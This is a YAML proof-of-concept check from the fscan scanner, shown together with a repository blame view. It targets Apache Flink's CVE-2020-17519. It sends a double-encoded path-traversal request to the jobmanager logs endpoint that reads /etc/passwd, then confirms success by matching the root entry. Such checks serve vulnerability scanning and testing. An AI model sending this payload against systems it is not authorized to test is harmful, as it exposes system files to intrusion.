fscan/WebScan/pocs/flink-jobmanager-cve-2020-1...

name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi
rules:
  - method: GET
    path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
    expression: |
      response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body)
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
优化xray解析模块,支持groups、新增poc 2021-11-15 19:53:46 -08:00			`name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi`
			`rules:`
			`- method: GET`
			`path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd`
			`expression: \|`
			`response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body)`
			`detail:`
			`author: MaxSecurity(https://github.com/MaxSecurity)`
			`links:`
			`- https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519`